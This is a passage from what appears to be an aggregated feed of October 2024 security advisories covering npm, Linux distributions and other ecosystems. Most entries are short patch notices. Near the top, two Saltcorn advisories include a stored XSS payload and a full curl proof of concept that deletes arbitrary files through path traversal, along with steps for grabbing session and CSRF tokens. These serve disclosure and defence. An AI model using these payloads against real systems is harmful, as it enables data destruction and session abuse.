user with staff role (you can do the same steps also with an admin user)- visit `http://localhost:3000/view/my_xss_view`- in the `payload` field insert ``"<svg/onload=alert(`xss`)>`` and click `Save`With an admin user inspect the log entry generated by the above action:- visit `http://localhost:3000/eventlog`- click on the event log generated (`http://localhost:3000/eventlog/<event-number>`)- an alert will appear### ImpactStored Cross-Site Scripting (XSS)### Recommended MitigationSanitize the user input before building HTML elements	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PF56-H9QF-RXQ4
07.10.2024 22:37:48	npm	[NPM:GHSA-43F3-H63W-P6F6] Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability (high)	### SummaryA logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`.### Details- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346```jsrouter.post( "/clean_sync_dir", error_catcher(async (req, res) => { const { dir_name } = req.body; // [1] source try { const rootFolder = await File.rootFolder(); const syncDir = path.join( rootFolder.location, "mobile_app", "sync", dir_name // [2] ); await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink res.status(200).send(""); } catch (error) { getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`); res.status(400).json({ error: error.message \|\| error }); } }));```### PoCThe following PoC can be executed with a user with any role (`admin`, `staff`, `user`, `public`)- create a file in a folder different from where the server is started:```touch /tmp/secretcat /tmp/secret```- log with a user and retrieve valid `connect.sid` and `_csrf` values*- send the following `curl` request```curl -i -X $'POST' \ -H $'Host: localhost:3000' \ -H $'Content-Type: application/x-www-form-urlencoded' \ -H $'Content-Length: 93' \ -H $'Origin: http://localhost:3000' \ -H $'Connection: close' \ -b $'connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true' \ --data-binary $'_csrf=VALID_CSRF_VALUE&dir_name=/../../../../../../../../../../tmp/secret' \ $'http://localhost:3000/sync/clean_sync_dir'```- check if the file previously created does not exist anymore:```cat /tmp/secretcat: /tmp/secret: No such file or directory```* obtain `connect.sid` and `_csrf` valuesA possible way to retrieve `connect.sid` and `_csrf` values is to use the password reset functionality:- log in- open the browser developer console, go to the `Network` tab filter for `settings` request- visit `http://localhost:3000/auth/settings`- trigger the change password functionality- under the `Headers` and `Request` tabs, grab the `connect.sid` and `_csrf` values and replace them in the curl command ### ImpactArbitrary file delete### Recommended MitigationResolve the `syncDir` and check if it starts with `rootFolder.location/mobile_app/sync`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-43F3-H63W-P6F6
07.10.2024 15:16:34	suse	[SUSE-SU-2024:3538-1] Security update for mozjs115 (moderate)	Security update for mozjs115	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3538-1
07.10.2024 15:16:17	suse	[SUSE-SU-2024:3537-1] Security update for redis7 (important)	Security update for redis7	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3537-1
07.10.2024 14:29:03	ubuntu	[USN-7057-1] WEBrick vulnerability	WEBrick could allow a HTTP request smuggling attack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7057-1
09.10.2024 04:31:01	fedora	[FEDORA-2024-aaa468ae4f] Fedora 40: perl-App-cpanminus (critical)	Patch the code to use https instead of http (CVE-2024-45321)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aaa468ae4f
09.10.2024 04:31:00	fedora	[FEDORA-2024-326390f033] Fedora 40: logiops (high)	Fixes CVE-2024-45752: A vulnerability that allows users to remap keysarbitrarily. This allows all users on the system to remap a key unexpectedly toa potentially malicious sequence	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-326390f033
09.10.2024 03:47:07	fedora	[FEDORA-2024-78e43b4de6] Fedora 39: perl-App-cpanminus (critical)	Patch the code to use https instead of http (CVE-2024-45321)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-78e43b4de6
09.10.2024 03:47:06	fedora	[FEDORA-2024-69ce052378] Fedora 39: logiops (high)	Fixes CVE-2024-45752: A vulnerability that allows users to remap keysarbitrarily. This allows all users on the system to remap a key unexpectedly toa potentially malicious sequence	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-69ce052378
09.10.2024 03:18:18	fedora	[FEDORA-2024-6ecf5236ae] Fedora 41: p7zip	Fix wrapper to hide password from process history	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6ecf5236ae
09.10.2024 03:17:52	fedora	[FEDORA-2024-851219f5e3] Fedora 41: crosswords (medium)	Update to 0.3.13.3 and fix gresource generation	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-851219f5e3
09.10.2024 03:17:47	fedora	[FEDORA-2024-ef9db8b16d] Fedora 41: perl-App-cpanminus (critical)	Patch the code to use https instead of http (CVE-2024-45321)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef9db8b16d
09.10.2024 03:17:41	fedora	[FEDORA-2024-1a9b10c921] Fedora 41: logiops (high)	Fixes CVE-2024-45752: A vulnerability that allows users to remap keysarbitrarily. This allows all users on the system to remap a key unexpectedly toa potentially malicious sequence	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1a9b10c921
08.10.2024 22:17:19	ubuntu	[USN-7058-1] .NET vulnerabilities	Several security issues were fixed in dotnet6, dotnet8.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7058-1
09.10.2024 01:23:12	maven	[MAVEN:GHSA-JQH2-CH7P-XWXH] Quarkus CXF logs passwords and other secrets (moderate)	A vulnerability was found in Quarkus CXF. Passwords and other secrets may appear in the application log in spite of the user configuring them to be hidden. This issue requires some special configuration to be vulnerable, such as SOAP logging enabled, application set client, and endpoint logging properties, and the attacker must have access to the application log.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQH2-CH7P-XWXH
09.10.2024 01:23:07	maven	[MAVEN:GHSA-5WPR-CJ9P-959R] HTTP Request Smuggling Leading to Client Timeouts in resteasy-netty4 (moderate)	A vulnerability was found in the resteasy-netty4 library arising from improper handling of HTTP requests using smuggling techniques. When an HTTP smuggling request with an ASCII control character is sent, it causes the Netty HttpObjectDecoder to transition into a BAD_MESSAGE state. As a result, any subsequent legitimate requests on the same connection are ignored, leading to client timeouts, which may impact systems using load balancers and expose them to risk.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5WPR-CJ9P-959R
08.10.2024 19:35:10	ubuntu	[USN-7057-2] WEBrick vulnerability	WEBrick could allow a HTTP request smuggling attack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7057-2
08.10.2024 22:19:01	pypi	[PYSEC-2024-102] django vulnerability	An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-102
08.10.2024 18:10:23	suse	[SUSE-SU-2024:3553-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3553-1
08.10.2024 18:04:21	suse	[SUSE-SU-2024:3552-1] Security update for pgadmin4 (moderate)	Security update for pgadmin4	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3552-1
08.10.2024 18:03:16	suse	[SUSE-SU-2024:3551-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3551-1
08.10.2024 17:18:02	ubuntu	[USN-7014-2] nginx vulnerability	nginx could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7014-2
08.10.2024 17:07:52	suse	[SUSE-SU-2024:3550-1] Security update for podofo (moderate)	Security update for podofo	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3550-1
08.10.2024 17:07:20	suse	[SUSE-SU-2024:3549-1] Security update for redis7 (important)	Security update for redis7	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3549-1
08.10.2024 17:06:54	suse	[SUSE-SU-2024:3548-1] Security update for Mesa (moderate)	Security update for Mesa	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3548-1
08.10.2024 17:06:33	suse	[SUSE-SU-2024:3547-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3547-1
08.10.2024 17:04:51	suse	[SUSE-SU-2024:3546-1] Security update for podman (moderate)	Security update for podman	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3546-1
08.10.2024 17:04:20	suse	[SUSE-SU-2024:3545-1] Security update for buildah (moderate)	Security update for buildah	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3545-1
08.10.2024 17:04:05	suse	[SUSE-SU-2024:3544-1] Security update for Mesa (moderate)	Security update for Mesa	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3544-1
08.10.2024 16:33:36	suse	[SUSE-SU-2024:3543-1] Security update for json-lib (moderate)	Security update for json-lib	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3543-1
08.10.2024 11:33:37	suse	[SUSE-SU-2024:3541-1] Security update for podofo (moderate)	Security update for podofo	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3541-1
08.10.2024 11:30:23	suse	[SUSE-SU-2024:3540-1] Security update for Mesa (moderate)	Security update for Mesa	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3540-1
08.10.2024 17:38:54	npm	[NPM:GHSA-PR45-CG4X-FF4M] ggit is vulnerable to Arbitrary Argument Injection via the clone() API (moderate)	All versions of the package ggit are vulnerable to Arbitrary Argument Injection via the clone() API, which allows specifying the remote URL to clone and the file on disk to clone to. The library does not sanitize for user input or validate a given URL scheme, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PR45-CG4X-FF4M
08.10.2024 17:38:50	npm	[NPM:GHSA-62CX-5XJ4-WFM4] ggit is vulnerable to Command Injection via the fetchTags(branch) API (moderate)	All versions of the package ggit are vulnerable to Command Injection via the fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-62CX-5XJ4-WFM4
08.10.2024 17:37:56	npm	[NPM:GHSA-6339-GV7W-G5F4] SAP HANA Node.js client package vulnerable to Prototype Pollution (moderate)	The SAP HANA Node.js client package versions from 2.0.0 before 2.21.31 is impacted by Prototype Pollution vulnerability allowing an attacker to add arbitrary properties to global object prototypes. This is due to improper user input sanitation when using the nestTables feature causing low impact on the availability of the application. This has no impact on Confidentiality and Integrity.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6339-GV7W-G5F4
09.10.2024 02:13:59	rustsec	[RUSTSEC-2024-0377] Heap Buffer overflow using c_chars_to_str function	The `heap-buffer-overflow` is triggered in the `strlen()` function when handling the `c_chars_to_str` function in the dbn crate. This vulnerability occurs because the `CStr::from_ptr()` function in Rust assumes that the provided C string is null-terminated. However, there is no guarantee that the input chars array passed to the c_chars_to_str function is properly null-terminated.If the chars array does not contain a null byte (\0), strlen() will continue to read beyond the bounds of the buffer in search of a null terminator. This results in an out-of-bounds memory read and can lead to a heap-buffer-overflow, potentially causing memory corruption or exposing sensitive information.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0377
08.10.2024 21:50:10	npm	[NPM:GHSA-QVQV-MCXR-X8QW] Slim Select has potential Cross-site Scripting issue (low)	Slim Select 2.0 versions through 2.9.0 are affected by a potential cross-site scripting vulnerability. In select.ts:createOption(), the text variable from the user-provided Options object is assigned to an innerHTML without sanitation. Software that depends on this library to dynamically generate lists using unsanitized user-provided input may be vulnerable to cross-site scripting, resulting in attacker executed JavaScript. At this time, no patch is available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QVQV-MCXR-X8QW
08.10.2024 20:22:06	pypi	[PYSEC-2024-100] openc3 vulnerability	OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. The login functionality contains a reflected cross-site scripting (XSS) vulnerability. This vulnerability is fixed in 5.19.0. Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-100
08.10.2024 20:22:06	pypi	[PYSEC-2024-101] openc3 vulnerability	OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. A path traversal vulnerability inside of LocalMode's open_local_file method allows an authenticated user with adequate permissions to download any .txt via the ScreensController#show on the web server COSMOS is running on (depending on the file permissions). This vulnerability is fixed in 5.19.0.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-101
08.10.2024 21:56:11	npm	[NPM:GHSA-GJ3P-J74V-3X57] ReLaXed Cross-site Scripting vulnerability (low)	A vulnerability classified as problematic has been found in RelaxedJS ReLaXed up to 0.2.2. Affected is an unknown function of the component Pug to PDF Converter. The manipulation leads to cross site scripting. An attack has to be approached locally. The exploit has been disclosed to the public and may be used.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GJ3P-J74V-3X57
10.10.2024 11:26:17	ubuntu	[USN-7022-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-3
10.10.2024 06:41:37	ubuntu	[USN-7060-1] EDK II vulnerabilities	Several security issues were fixed in EDK II.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7060-1
10.10.2024 05:00:48	fedora	[FEDORA-2024-7ee01adadc] Fedora 40: koji	Update to 1.35.1. Includes fix for CVE-2024-9427	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7ee01adadc
10.10.2024 05:00:34	fedora	[FEDORA-2024-051cf1553e] Fedora 40: xen	x86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-051cf1553e
10.10.2024 03:51:05	fedora	[FEDORA-2024-020dbf247c] Fedora 39: xen	x86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]update to xen-4.17.5	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-020dbf247c
10.10.2024 03:18:41	fedora	[FEDORA-2024-d85494e836] Fedora 41: firefox	Updated to latest upstream (131.0.2)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d85494e836
10.10.2024 03:18:21	fedora	[FEDORA-2024-92d80d7f9a] Fedora 41: webkit2gtk4.0 (high)	Update to 2.46.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-92d80d7f9a
10.10.2024 03:18:17	fedora	[FEDORA-2024-a5d6cd9f0a] Fedora 41: unbound (medium)	Fixed builds on F41. Fixes CVE-2024-8508https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a5d6cd9f0a
10.10.2024 03:17:45	fedora	[FEDORA-2024-60809cb44e] Fedora 41: xen	x86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-60809cb44e
10.10.2024 00:27:44	slackware	[SSA:2024-283-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz: Upgraded. This update contains a critical security fix: Use-after-free in Animation timeline. "An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild." For more information, see: https://www.mozilla.org/en-US/firefox/115.16.1/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-51/ https://www.cve.org/CVERecord?id=CVE-2024-9680 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.16.1esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.16.1esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.3.1esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.3.1esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:00c7a2a509f6c85744070daf20b07781 mozilla-firefox-115.16.1esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:b6c3a0f2b962619b7dcc94fc5c837d4c mozilla-firefox-115.16.1esr-x86_64-1_slack15.0.txzSlackware -current package:5a2ff4e9f83f0e27c62986729855b27d xap/mozilla-firefox-128.3.1esr-i686-1.txzSlackware x86_64 -current package:f3e0b28a1ba03c47e0a627dfa9326c5b xap/mozilla-firefox-128.3.1esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-283-01
09.10.2024 19:55:21	suse	[SUSE-SU-2024:3575-1] Security update for redis (important)	Security update for redis	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3575-1
09.10.2024 18:01:53	ubuntu	[USN-7059-1] OATH Toolkit vulnerability	oath-toolkit could be made overwrite files as the administrator.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7059-1
09.10.2024 16:28:57	suse	[SUSE-SU-2024:3570-1] Security update for cups-filters (critical)	Security update for cups-filters	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3570-1
09.10.2024 18:26:14	maven	[MAVEN:GHSA-JQFV-JRVQ-95JM] Apache XML Graphics FOP XML External Entity Reference ('XXE') vulnerability (moderate)	Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP.This issue affects Apache XML Graphics FOP: 2.9.Users are recommended to upgrade to version 2.10, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQFV-JRVQ-95JM
09.10.2024 15:00:34	ubuntu	[USN-7043-4] cups-filters vulnerabilities	cups-filters could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-4
09.10.2024 14:55:23	ubuntu	[USN-7042-2] cups-browsed vulnerability	cups-browsed could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-2
09.10.2024 14:52:12	suse	[SUSE-SU-2024:3569-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3569-1
09.10.2024 12:46:04	suse	[SUSE-SU-2024:3567-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3567-1
09.10.2024 12:43:40	suse	[SUSE-SU-2024:3566-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3566-1
09.10.2024 12:40:48	suse	[SUSE-SU-2024:3565-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3565-1
09.10.2024 12:09:06	suse	[SUSE-SU-2024:3564-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3564-1
09.10.2024 12:04:25	suse	[SUSE-SU-2024:3563-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3563-1
09.10.2024 11:45:13	suse	[SUSE-SU-2024:3561-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3561-1
09.10.2024 11:19:18	suse	[SUSE-SU-2024:3559-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3559-1
09.10.2024 09:17:10	suse	[SUSE-SU-2024:3554-1] Security update for mozjs78 (moderate)	Security update for mozjs78	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3554-1
09.10.2024 11:55:36	almalinux	[ALSA-2024:7699] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7699
09.10.2024 11:57:20	almalinux	[ALSA-2024:7700] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7700
10.10.2024 02:46:56	npm	[NPM:GHSA-JJ78-5FMV-MV28] Express Open Redirect vulnerability (low)	URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Express. This vulnerability affects the use of the Express Response object. This issue impacts Express: from 3.4.5 before 4.0.0-rc1.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJ78-5FMV-MV28
09.10.2024 11:59:28	almalinux	[ALSA-2024:7457] mod_jk bug fix update (moderate)	mod_jk bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7457
11.10.2024 12:09:33	ubuntu	[USN-7020-4] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-4
11.10.2024 01:46:30	slackware	[SSA:2024-284-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.16.0esr/releasenotes/ (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.16.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.3.1esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.3.1esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:3932f71bbd08c2fa52e525f01751da0e mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:99d66a23352c22066048dadfeed4c4a0 mozilla-thunderbird-115.16.0esr-x86_64-1_slack15.0.txzSlackware -current package:1a10587221395fdc1617003e553e3fec xap/mozilla-thunderbird-128.3.1esr-i686-1.txzSlackware x86_64 -current package:c6613d1a758d1115da027dd46a072b64 xap/mozilla-thunderbird-128.3.1esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-284-01
11.10.2024 00:29:10	fedora	[FEDORA-2024-db72f480e8] Fedora 40: firefox	New upstream version (131.0.2)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-db72f480e8
11.10.2024 00:27:32	fedora	[FEDORA-2024-f109ae6fc7] Fedora 39: firefox	Updated to latest upstream (131.0.2)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f109ae6fc7
10.10.2024 19:03:49	suse	[SUSE-SU-2024:3592-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3592-1
10.10.2024 18:34:34	suse	[SUSE-SU-2024:3591-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3591-1
10.10.2024 16:29:54	suse	[SUSE-SU-2024:3587-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3587-1
10.10.2024 15:55:01	ubuntu	[USN-7061-1] Go vulnerabilities	Several security issues were fixed in Go.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7061-1
10.10.2024 15:06:46	ubuntu	[USN-7062-1] libgsf vulnerabilities	libgsf could be made to run programs as your login if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7062-1
10.10.2024 14:29:45	suse	[SUSE-SU-2024:3586-1] Security update for xen (important)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3586-1
10.10.2024 12:05:14	suse	[SUSE-SU-2024:3585-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3585-1
11.10.2024 00:00:06	npm	[NPM:GHSA-434G-2637-QMQR] Elliptic's verify function omits validation (low)	The Elliptic package 6.5.5 for Node.js for EDDSA implementation does not perform the required check if the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the `verify` function in `lib/elliptic/eddsa/index.js` omits `sig.S().gte(sig.eddsa.curve.n) \|\| sig.S().isNeg()` validation.This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-434G-2637-QMQR
10.10.2024 14:24:01	almalinux	[ALSA-2024:7848] openssl security update (low)	openssl security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7848
10.10.2024 14:22:19	almalinux	[ALSA-2024:7851] .NET 6.0 security update (important)	.NET 6.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7851
10.10.2024 14:20:14	almalinux	[ALSA-2024:7868] .NET 8.0 security update (important)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7868
12.10.2024 04:52:15	fedora	[FEDORA-2024-f71b7dad10] Fedora 39: mosquitto	Update to 2.0.19	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f71b7dad10
12.10.2024 04:52:11	fedora	[FEDORA-2024-68f9c0741f] Fedora 39: redis (high)	Redis Community Edition 7.2.6 Released Wed 02 Oct 2024 20:17:04 IDTUpgrade urgency SECURITY: See security fixes below.Security fixesCVE-2024-31449 Lua library commands may lead to stack overflow and potentialRCE.CVE-2024-31227 Potential Denial-of-service due to malformed ACL selectors.CVE-2024-31228 Potential Denial-of-service due to unbounded pattern matching.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-68f9c0741f
12.10.2024 04:52:09	fedora	[FEDORA-2024-8831059030] Fedora 39: python-cramjam, rust-brotli, rust-nu-command, rust-brotli-decompressor, rust-libcramjam0.2 & 4 more	Update rust-brotli-decompressor to 4.0.1, rust-brotli to 7.0.0, and rust-async-compression to 0.4.13. Patch dependent packages as needed to avoid compatpackages.Rebuild with the latest Rust crate dependency versions; fix automatic provideson Python extension due to SONAME when built with Rust 1.81 or later.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8831059030
12.10.2024 04:44:06	fedora	[FEDORA-2024-4ab266b9ca] Fedora 40: chromium (high)	Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in V	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4ab266b9ca
12.10.2024 04:42:23	fedora	[FEDORA-2024-5b8cfa7937] Fedora 40: thunderbird	Update to 128.3.1https://www.thunderbird.net/en-US/thunderbird/128.3.1esr/releasenotes/Update to 128.3.0https://www.mozilla.org/en-US/security/advisories/mfsa2024-49/https://www.thunderbird.net/en-US/thunderbird/128.3.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5b8cfa7937
12.10.2024 04:42:06	fedora	[FEDORA-2024-e36b567b66] Fedora 40: mosquitto	Update to 2.0.19	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e36b567b66
12.10.2024 04:41:59	fedora	[FEDORA-2024-5d4eb04e76] Fedora 40: redis (high)	Redis Community Edition 7.2.6 Released Wed 02 Oct 2024 20:17:04 IDTUpgrade urgency SECURITY: See security fixes below.Security fixesCVE-2024-31449 Lua library commands may lead to stack overflow and potentialRCE.CVE-2024-31227 Potential Denial-of-service due to malformed ACL selectors.CVE-2024-31228 Potential Denial-of-service due to unbounded pattern matching.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d4eb04e76
